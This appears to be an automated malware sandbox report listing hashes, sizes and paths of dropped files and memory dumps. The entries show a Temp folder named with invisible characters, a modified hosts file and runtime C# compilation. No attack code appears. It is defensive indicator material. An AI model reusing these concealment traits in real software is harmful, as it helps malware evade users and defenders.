11914df217bae271ba9ef19ad7aec930cb13490ac30fc9e6f9beb9e4739a7558

SHA512
81d4e49260eee6c72601e0557e930aa73cb4762d182e60056dcbea643f206158868f20ddaf01c58856921fa270cb606a135d56f37ebb9066a6b581d40627194c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Desktop\FindBlock.docx

Filesize
304KB

MD5
9ebcdec7771b65a48b2561cd82337180

SHA1
e28a53ea3cb76371f32f29f0c347972e42ecb271

SHA256
2d7326ecaaa0358415bb59b484601b75a35ecaf8216070b87c50d00f14e2f159

SHA512
89fe6bf62bc3a9bdca98a051be594129a38ef9df1663c3023a47a50fd6d89fd1a13dc97cd661f8c5fbbbe4266f3d4eff0b5e66f5d308bac1f4e3b328005e010e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Desktop\GroupRedo.xlsx

Filesize
15KB

MD5
69b81231768d2faed4cbe5151da5f3a0

SHA1
0f52f3d52ecc8bf844d68625131110cccf96b809

SHA256
34e679033b81693a9c5038a6fbd4a89d33c983ce3fcaef13b0254aec2e7f3117

SHA512
f6eaf3a6e49d8e75a730876062613104844bc15190639e34c2943f405c365fd5851480982787f38180d705defe9f854eccb956c0b37e9a414fd7a834b84ec27f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Desktop\RestoreHide.xlsx

Filesize
16KB

MD5
c11fb858d21774d6e35bdf473be68ac7

SHA1
7bd2977374828bb843948bb072a660768ea4cff4

SHA256
e64bc5e56ad9b181556143c16e0aa63033f6305c17c667c33729105bb3ba57ca

SHA512
bbae64e4b68649109c9e8a6be94f7fc9b761a8ee011a00f8cb3e2b085db982112d2cecc058d032c1c1fbb312859f662187d95c9ccc2f83f18df80efc80674bc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Desktop\ResumeSelect.xlsx

Filesize
10KB

MD5
b3e61a86c1e938f6ec54f0020cae7f17

SHA1
673a95e4d4d66be122b8927b034bd6e2737162a2

SHA256
b9f65f33362bcc47558e8005e91b51ad58e39f0e91fda49436312b1ad4d2f178

SHA512
29e495929e53cd47473ece07793b82e01b5ab07c8720998cdd299ed111675f13353106d51b12f69607546594ac8f28d9c6ab4ef8f4f386b58e1535ce4196d6dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Desktop\SplitSubmit.xlsx

Filesize
11KB

MD5
64cd5f0571b3ddfec0aefa639ed94262

SHA1
c79f928500fa83a0173994b2e929b67df1123d17

SHA256
d2b31427058756a02d5bb91f423690683d062659038e526987893fd40b2a46c0

SHA512
c8a58d1f7d10bc45196fd548e39a8ddcb1f3a6e23d5f822c657ebae871f31e06d563e0a364674a4ce97c7e94cb1a290920af700b759bb133715218d5506a0edb

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Desktop\SwitchBackup.mht

Filesize
698KB

MD5
c0140baa8391bb52326f25233f2fcc95

SHA1
6b4b639ce020c4f5770ef51d69b6873ed4493fb8

SHA256
0087539b3261d42d2d7eefbb168ddd9eddee881057f8ef33221e8c1b7895488a

SHA512
0d65428876d970c2fe7712d2766e32133dd72d426426f1db2f5bf12e4661d382c03f381ef57f0164a100b1412258076788ee1d0627fc738f245c233e21e56cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Desktop\UnregisterStop.docx

Filesize
324KB

MD5
939a573c2baaf1b4e6e0cf3ac4ec9e70

SHA1
0223c42171c9bd3cb051cc95f7e8148f202ddb29

SHA256
96fb7960b59ff322776e1498ed9116f01bc0bea34c29d8786098f5419fa0c16e

SHA512
a4d518e96febc2086bab9993627f26fb177dca2833ffbecc0f1083bcc6bef1e2e4a80edf7790c17fcb0da0aa2f5e2281544cb63abf45e189d22c709925fdceb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Documents\BackupCopy.pub

Filesize
719KB

MD5
0664338dfb355fbc66f77317dc1e7c0c

SHA1
4cd6eee98745be66b26e251bc761619fc2bfb39a

SHA256
12e6e205abf17729b6a7e8b70c4ec78bf0acbd0d33cd58a680ecf9bab16dcd6a

SHA512
6401a18b04bb195b556b3928b010abeba2ac732e996a481d573b8f95d3a176636759d38b38f1938e3f963d9c7d496e2754fe89ead709a251810d7481cc6433e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Documents\DisconnectUpdate.xlsx

Filesize
10KB

MD5
481ec891b9a59697c49430e756aa1f1d

SHA1
0a1e853a03a6403477bb53cc9a6e505d7caddf2c

SHA256
27729b5e627361d37bb4b36e9481f31def7524c78401e3013e2aed8a28fba572

SHA512
de35bcd7d668d53c45c20b06b014920ca77abae6e886cad7c50abba542b4d366a725af0abd3d00552f72249a8600a6413f0ead19f3d98f86432c65afe197d39f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Documents\DismountSubmit.docx

Filesize
1.0MB

MD5
bca805e59854fa1f0afaca148f6d1baa

SHA1
d819bfc921036043046b3199e2d384ac6988c3cd

SHA256
c724282611e4f9b9d79f152d650138408e9eb41fa6230d11b51af6d51869fd78

SHA512
f1b1e99f657ef5bb8b0abbf9f3af3b7687f19a07c11d0ff627e7d17bf97beaa3935e20e8a5243240934d73c00a9fa1c24c638446d1f9312700e70b2c3bbaf1c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‏‍ ‌ \Common Files\Documents\LimitExport.pdf

Filesize
795KB

MD5
7b5ab810aabd265f9699ccf053e61d8f

SHA1
2e77fd0f158cc70b78c51de790e297432ab08ec4

SHA256
7d2cafd89b61654c13c3834faa2f6c4b9ab0a3ca5331bd64745ed6e701a82036

SHA512
2b49a9664f91b6324cf02137e3d4c73d38e4f4ffa1ebf8f7fd5c7667e74f959fde57485d170329ebd9640063c4b7241967c0147547696b3f9c792dcbbf35c976

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\t1tazrgp\CSCA29948347EFA4E028FB7B8BC257E18D.TMP

Filesize
652B

MD5
87589390332b749f3c55d96e5cc4c387

SHA1
1886351afddc9dc6eb163b4d161b714355c987d4

SHA256
adb1efdaa3b7aa90063d765b37b2db5082064c0c45902e01b67cc0682af423b6

SHA512
399450d998d2cb61a3cc5a1f494c992c12000d75b6f924c099666bb74d970c655edd76a5d4768c01e2b4c083dd2b39b7fe536f692c8de05253a08f9798bea51e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\t1tazrgp\t1tazrgp.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\t1tazrgp\t1tazrgp.cmdline

Filesize
607B

MD5
98ccecad191171aa6d2d6d84e9d886d1

SHA1
2ded58972591a2de34262c0796ee3a252eb08d18

SHA256
72f8a8d130f45e80ac4415af43f7b3c1317abddae47453f0512f5ed3b03534b5

SHA512
ab4735f10fb3a5d95139faf74b85492f6a3cab93645ca8235ed53d6e9068969490a699a956c51ae58c52f13dec5d1dbd4b01168a9fdf278204f35ae65237c045

Download Submit
memory/548-299-0x00007FF7C4FD0000-0x00007FF7C4FF7000-memory.dmp

Filesize
156KB

Download
memory/1508-86-0x0000025DD4240000-0x0000025DD4262000-memory.dmp

Filesize
136KB

Download
memory/2572-210-0x0000022DF7B70000-0x0000022DF7B78000-memory.dmp

Filesize
32KB

Download
memory/2700-80-0x00007FF9F5930000-0x00007FF9F5A48000-memory.dmp

Filesize
1.1MB

Download
memory/2700-118-0x00007FFA04F20000-0x00007FFA04F39000-memory.dmp

Filesize
100KB

Download
memory/2700-91-0x00007FFA05020000-0x00007FFA0503F000-memory.dmp

Filesize
124KB

Download
memory/2700-78-0x00007FFA04C60000-0x00007FFA04C6D000-memory.dmp

Filesize
52KB

Download
memory/2700-77-0x00007FFA04D90000-0x00007FFA04DA4000-memory.dmp

Filesize
80KB

Download
memory/2700-70-0x00007FF9F60D0000-0x00007FF9F653E000-memory.dmp

Filesize
4.4MB

Download
memory/2700-267-0x00007FFA04E10000-0x00007FFA04E3E000-memory.dmp

Filesize
184KB

Download
memory/2700-72-0x000001CE616E0000-0x000001CE61A55000-memory.dmp

Filesize
3.5MB

Download
memory/2700-280-0x00007FF9F5DD0000-0x00007FF9F5E88000-memory.dmp

Filesize
736KB

Download
memory/2700-281-0x000001CE616E0000-0x000001CE61A55000-memory.dmp

Filesize
3.5MB

Download
memory/2700-285-0x00007FF9F5A50000-0x00007FF9F5DC5000-memory.dmp

Filesize
3.5MB

Download
memory/2700-73-0x00007FF9F5A50000-0x00007FF9F5DC5000-memory.dmp

Filesize
3.5MB

Download
memory/2700-74-0x00007FFA08EC0000-0x00007FFA08EE4000-memory.dmp

Filesize
144KB

Download
memory/2700-71-0x00007FF9F5DD0000-0x00007FF9F5E88000-memory.dmp

Filesize
736KB

Download
memory/2700-66-0x00007FFA04E10000-0x00007FFA04E3E000-memory.dmp

Filesize
184KB

Download
memory/2700-64-0x00007FFA04F10000-0x00007FFA04F1D000-memory.dmp

Filesize
52KB

Download
memory/2700-62-0x00007FFA04F20000-0x00007FFA04F39000-memory.dmp

Filesize
100KB

Download
memory/2700-60-0x00007FFA04600000-0x00007FFA04769000-memory.dmp

Filesize
1.4MB

Download
memory/2700-58-0x00007FFA05020000-0x00007FFA0503F000-memory.dmp

Filesize
124KB

Download
memory/2700-56-0x00007FFA05040000-0x00007FFA05059000-memory.dmp

Filesize
100KB

Download
memory/2700-54-0x00007FFA05200000-0x00007FFA0522D000-memory.dmp

Filesize
180KB

Download
memory/2700-48-0x00007FFA0D090000-0x00007FFA0D09F000-memory.dmp

Filesize
60KB

Download
memory/2700-30-0x00007FFA08EC0000-0x00007FFA08EE4000-memory.dmp

Filesize
144KB

Download
memory/2700-25-0x00007FF9F60D0000-0x00007FF9F653E000-memory.dmp

Filesize
4.4MB

Download
memory/2700-300-0x00007FF7C4FD0000-0x00007FF7C4FF7000-memory.dmp

Filesize
156KB

Download
memory/2700-307-0x00007FFA04600000-0x00007FFA04769000-memory.dmp

Filesize
1.4MB

Download
memory/2700-306-0x00007FFA05020000-0x00007FFA0503F000-memory.dmp

Filesize
124KB

Download
memory/2700-301-0x00007FF9F60D0000-0x00007FF9F653E000-memory.dmp

Filesize
4.4MB

Download
memory/2700-302-0x00007FFA08EC0000-0x00007FFA08EE4000-memory.dmp

Filesize
144KB

Download